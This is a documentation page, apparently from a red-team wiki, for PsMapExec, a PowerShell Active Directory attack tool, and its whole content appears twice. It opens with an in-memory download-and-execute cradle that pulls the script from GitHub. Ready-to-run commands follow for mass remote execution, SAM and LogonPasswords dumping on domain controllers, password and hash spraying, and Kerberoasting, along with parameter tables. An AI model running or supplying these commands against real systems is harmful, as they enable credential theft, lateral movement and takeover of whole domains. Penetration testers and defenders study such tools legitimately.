PsMapExec

Last updated 11 months ago

Was this helpful?

PsMapExec

Get it on GitHub:

# Load directly into memory and execute
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")

Usage Examples

# Execute WMI commands over all systems in the domain using password authentication
 PsMapExec -Targets all -Method WMI -Username Admin -Password Pass -Command ""net user""

# Execute WinRM commands over all systems in the domain using hash authentication
PsMapExec -Targets all -Method WinRM -Username Admin -Hash [Hash] -Command ""net user""

# Check RDP Access against workstations in the domain and using local authentication
PsMapExec -Targets Workstations -Method RDP -Username LocalAdmin -Password Pass -LocalAuth
 
# Dump SAM on a single system using SMB and a -ticket for authentication
PsMapExec -Targets DC01.Security.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Check SMB Signing on all domain systems
PsMapExec -Targets All -Method GenRelayList

# Dump LogonPasswords on all Domain Controllers over WinRM
PsMapExec -Targets DCs -Method WinRM -Username Admin -Password Pass -Module LogonPasswords

# Use WMI to check current user admin access from systems read from a text file
PsMapExec -Targets C:\temp\Systems.txt -Method WMI

# Spray passwords across all accounts in the domain
PsMapExec -Method Spray -SprayPassword [Password]

# Spray Hashes across all accounts in the domain
PsMapExec -Method Spray -SprayHash [Hash]

# Spray Hashes across all Domain Admin group users
PsMapExec -Targets ""Domain Admins"" -Method Spray -SprayHash [Hash]

# Kerberoast 
PsMapExec -Method Kerberoast -ShowOutput

# IPMI
PsMapExec -Targets 192.168.1.0/24 IPMI

Usage Parameters

General Parameters

Parameter

Value

Description

-Command

whoami

Runs the specified command on the remote system

-CurrentUser

N/A

Instructs PsMapExec to run in current user context. This is default when no other credentials are specified

-Domain

[Domain]

Specifies what domain to run against. Otherwise the current user domain is used

-DomainController

[DC]

Specifies what Domain controller to authenticate against

-Force

N/A

Used to force PsMapExec to run when domain or enterprise admin credentials are used

-Flush

N/A

Flushes stored LDAP variables. Mostly only needed if working in a long term shell in a large enivronment where new computers and users may be added to the domain over time.

-Module

[Module]

Specifies the module to be used for command execution

-NoBanner

N/A

Surpresses the script banner

-NoParse

N/A

Surpresses parsing of some module outputs

-Rainbow

N/A

Queries an online rainbow table from dumped hashes with the modules "Sam, LogonPasswords and NTDS".

-SuccessOnly

N/A

Shows only successful results

-Timeout

[int]

Sets the port scan timeout (ms) against the specified method.

-Threads

[int]

Sets the concurrent executions jobs to run (Default:30)

Authentication Parameters

Parameter

Value

Description

-Hash

[RC4] or [AES256]

Hash value. Must be supplied with -Username

-LocalAuth

N/A

Used to specify when local account authentication should be used

-Password

[Password]

Password value. Must be suplied with -Username

-Ticket

[Ticket] or [Path to ticket]

B64 encoded Kerberos ticket to use for authentication. -Username is not required

Command execution Parameters

Parameter

Value

Description

-Command

[Command]

Runs the specified command on the remote system

-Module

[Module]

Specifies the module to be used for command execution

-ShowOutput

N/A

Displays output for executed modules. Commands will still be shown

Spraying Parameters

Parameter

Value

Description

-AccountAsPassword

N/A

Sprays SAM Account name values as passwords

-EmptyPassword

N/A

Sprays "blank" passwords

-SprayHash

[RC4] or [AES256]

Hash value to be used for hash spraying

-SprayPassword

[Password]

Password value to be used for hash spraying

Most of these have additional documentation that delves into more detail about each (Available on the left-hand sidebar of this page).

Generally, you can mix and match various parameters across different methods and modules.

Last updated 11 months ago

Was this helpful?

Get it on GitHub:

# Load directly into memory and execute
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")

Usage Examples

# Execute WMI commands over all systems in the domain using password authentication
 PsMapExec -Targets all -Method WMI -Username Admin -Password Pass -Command ""net user""

# Execute WinRM commands over all systems in the domain using hash authentication
PsMapExec -Targets all -Method WinRM -Username Admin -Hash [Hash] -Command ""net user""

# Check RDP Access against workstations in the domain and using local authentication
PsMapExec -Targets Workstations -Method RDP -Username LocalAdmin -Password Pass -LocalAuth
 
# Dump SAM on a single system using SMB and a -ticket for authentication
PsMapExec -Targets DC01.Security.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Check SMB Signing on all domain systems
PsMapExec -Targets All -Method GenRelayList

# Dump LogonPasswords on all Domain Controllers over WinRM
PsMapExec -Targets DCs -Method WinRM -Username Admin -Password Pass -Module LogonPasswords

# Use WMI to check current user admin access from systems read from a text file
PsMapExec -Targets C:\temp\Systems.txt -Method WMI

# Spray passwords across all accounts in the domain
PsMapExec -Method Spray -SprayPassword [Password]

# Spray Hashes across all accounts in the domain
PsMapExec -Method Spray -SprayHash [Hash]

# Spray Hashes across all Domain Admin group users
PsMapExec -Targets ""Domain Admins"" -Method Spray -SprayHash [Hash]

# Kerberoast 
PsMapExec -Method Kerberoast -ShowOutput

# IPMI
PsMapExec -Targets 192.168.1.0/24 IPMI

Usage Parameters

General Parameters

Parameter

Value

Description

-Command

whoami

Runs the specified command on the remote system

-CurrentUser

N/A

Instructs PsMapExec to run in current user context. This is default when no other credentials are specified

-Domain

[Domain]

Specifies what domain to run against. Otherwise the current user domain is used

-DomainController

[DC]

Specifies what Domain controller to authenticate against

-Force

N/A

Used to force PsMapExec to run when domain or enterprise admin credentials are used

-Flush

N/A

Flushes stored LDAP variables. Mostly only needed if working in a long term shell in a large enivronment where new computers and users may be added to the domain over time.

-Module

[Module]

Specifies the module to be used for command execution

-NoBanner

N/A

Surpresses the script banner

-NoParse

N/A

Surpresses parsing of some module outputs

-Rainbow

N/A

Queries an online rainbow table from dumped hashes with the modules "Sam, LogonPasswords and NTDS".

-SuccessOnly

N/A

Shows only successful results

-Timeout

[int]

Sets the port scan timeout (ms) against the specified method.

-Threads

[int]

Sets the concurrent executions jobs to run (Default:30)

Authentication Parameters

Parameter

Value

Description

-Hash

[RC4] or [AES256]

Hash value. Must be supplied with -Username

-LocalAuth

N/A

Used to specify when local account authentication should be used

-Password

[Password]

Password value. Must be suplied with -Username

-Ticket

[Ticket] or [Path to ticket]

B64 encoded Kerberos ticket to use for authentication. -Username is not required

Command execution Parameters

Parameter

Value

Description

-Command

[Command]

Runs the specified command on the remote system

-Module

[Module]

Specifies the module to be used for command execution

-ShowOutput

N/A

Displays output for executed modules. Commands will still be shown

Spraying Parameters

Parameter

Value

Description

-AccountAsPassword

N/A

Sprays SAM Account name values as passwords

-EmptyPassword

N/A

Sprays "blank" passwords

-SprayHash

[RC4] or [AES256]

Hash value to be used for hash spraying

-SprayPassword

[Password]

Password value to be used for hash spraying

Most of these have additional documentation that delves into more detail about each (Available on the left-hand sidebar of this page).

Generally, you can mix and match various parameters across different methods and modules.